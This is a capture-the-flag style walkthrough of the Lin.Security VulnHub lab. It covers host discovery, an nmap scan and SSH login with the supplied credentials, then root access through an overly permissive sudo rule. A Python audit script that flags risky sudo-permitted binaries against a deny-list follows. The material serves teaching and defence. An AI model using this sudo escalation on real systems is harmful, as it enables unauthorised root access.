Lin.Security
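Target VM: http://www.vulnhub.com/entry/linsecurity-1,244/
Because the VM's author provides the SSH username and password directly, this box is very simple.
Identifying the target host's IP address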
─(kali㉿kali)-[~/Vulnhub/Lin_Security]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.165.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:8c:bf:0a 1 60 PCS Systemtechnik GmbH
192.168.56.144 08:00:27:d8:9f:d6 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.144.
NMAP scan
─$ sudo nmap -sS -sV -sC -p- 192.168.56.144 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 08:56 EDT
Nmap scan report for bogon (192.168.56.144)
Host is up (0.00014s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
| 256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
|_ 256 b9:15:59:78:85:78:9e:a5:e6:16:f6:cf:96:2d:1d:36 (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 42673/tcp6 mountd
| 100005 1,2,3 43901/tcp mountd
| 100005 1,2,3 48518/udp6 mountd
| 100005 1,2,3 58572/udp mountd
| 100021 1,3,4 32885/tcp6 nlockmgr
| 100021 1,3,4 35243/udp nlockmgr
| 100021 1,3,4 40811/tcp nlockmgr
| 100021 1,3,4 58273/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
40811/tcp open nlockmgr 1-4 (RPC #100021)
43901/tcp open mountd 1-3 (RPC #100005)
52643/tcp open mountd 1-3 (RPC #100005)
57903/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:D8:9F:D6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.41 seconds
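The NMAP scan results show that port 2049 is open, i.e. an NFS share.
Privilege escalation to root
“To get started you can log onto the host with the credentials: bob/secret”
Because the challenge itself gives the username and password (bob/secret), you can log in directly over SSH.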
┌──(kali㉿kali)-[~/Vulnhub/Lin_Security]
└─$ ssh bob@192.168.56.144
bob@192.168.56.144's password:
██╗ ██╗███╗ ██╗ ███████╗███████╗ ██████╗██╗ ██╗██████╗ ██╗████████╗██╗ ██╗
██║ ██║████╗ ██║ ██╔════╝██╔════╝██╔════╝██║ ██║██╔══██╗██║╚══██╔══╝╚██╗ ██╔╝
██║ ██║██╔██╗ ██║ ███████╗█████╗ ██║ ██║ ██║██████╔╝██║ ██║ ╚████╔╝
██║ ██║██║╚██╗██║ ╚════██║██╔══╝ ██║ ██║ ██║██╔══██╗██║ ██║ ╚██╔╝
███████╗██║██║ ╚████║██╗███████║███████╗╚██████╗╚██████╔╝██║ ██║██║ ██║ ██║
╚══════╝╚═╝╚═╝ ╚═══╝╚═╝╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝
Welcome to lin.security | https://in.security | version 1.0
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on linsecurity:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bob may run the following commands on linsecurity:
(ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh,
/usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect,
/usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more,
/usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi,
/usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl,
/usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
bob@linsecurity:~$ sudo bash
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# cd /root
root@linsecurity:/root# ls -alh
total 32K
drwx------ 6 root root 4.0K Jul 11 2018 .
drwxr-xr-x 23 root root 4.0K Jul 10 2018 ..
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Jul 10 2018 .cache
-rw-r--r-- 1 root root 0 Jul 10 2018 .cloud-locale-test.skip
drwx------ 3 root root 4.0K Jul 10 2018 .gnupg
drwxr-xr-x 3 root root 4.0K Jul 9 2018 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Jul 9 2018 .ssh
root@linsecurity:/root#
This VM is very simple. I only tried /bin/bash from the list; many of the other commands can also be used for sudo privilege escalation.
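Seen from the defender's side, the `sudo -l` listing above is itself the finding: every entry is a shell, interpreter, editor or similar tool that should not be delegated as root. The following added example (not part of the original post) parses that listing and groups the entries by risk category; the `RISKY` deny-list, its category names and the function names are assumptions made for this illustration, and only absolute-path entries are handled.

```python
import re

# Constructed sample: the command list bob's `sudo -l` printed in the session above.
SUDO_L = """\
User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh,
        /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect,
        /usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more,
        /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi,
        /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl,
        /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
"""

# Assumption: an auditor-maintained deny-list covering only this page's binaries.
# Each can start other programs or read/write arbitrary files when run as root.
RISKY = {
    "shell": {"ash", "bash", "sh", "csh", "dash", "zsh"},
    "interpreter": {"awk", "perl", "tclsh", "expect"},
    "editor-or-pager": {"ed", "vi", "rvim", "pico", "less", "more", "man"},
    "program-launcher": {"env", "find", "git", "script", "socat", "ssh"},
    "file-transfer": {"curl", "ftp", "scp"},
}

def parse_sudo_l(text):
    """Return [(runas, command_path), ...] from `sudo -l` output."""
    body = text.partition("may run the following commands")[2]
    entries, runas = [], None
    for line in body.splitlines()[1:]:        # [1:] skips the rest of the header line
        m = re.match(r"\s*\(([^)]*)\)\s*(.*)", line)
        if m:                                  # a new "(runas) cmd, cmd, ..." entry
            runas, line = m.groups()
        for part in line.split(","):           # first absolute path skips tags (NOPASSWD:)
            if runas is not None and (p := re.search(r"(?<!\S)/\S+", part)):
                entries.append((runas, p.group()))
    return entries

def audit(text):
    """Group risky binaries that sudo lets the user run as root (or ALL)."""
    findings = {}
    for runas, path in parse_sudo_l(text):
        users = {u.strip() for u in runas.split(":")[0].split(",")}
        name = path.rsplit("/", 1)[-1]
        for category, names in RISKY.items():
            if name in names and users & {"ALL", "root"}:
                findings.setdefault(category, set()).add(path)
    return findings

if __name__ == "__main__":
    for category, paths in sorted(audit(SUDO_L).items()):
        print(f"{category:17}{', '.join(sorted(paths))}")
```

On a real host, pipe the output of `sudo -l -U <user>` (run as root) into `audit()` for each account and treat any non-empty result as a sudoers rule to tighten or remove.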
From: https://www.cnblogs.com/jason-huawen/p/16845880.html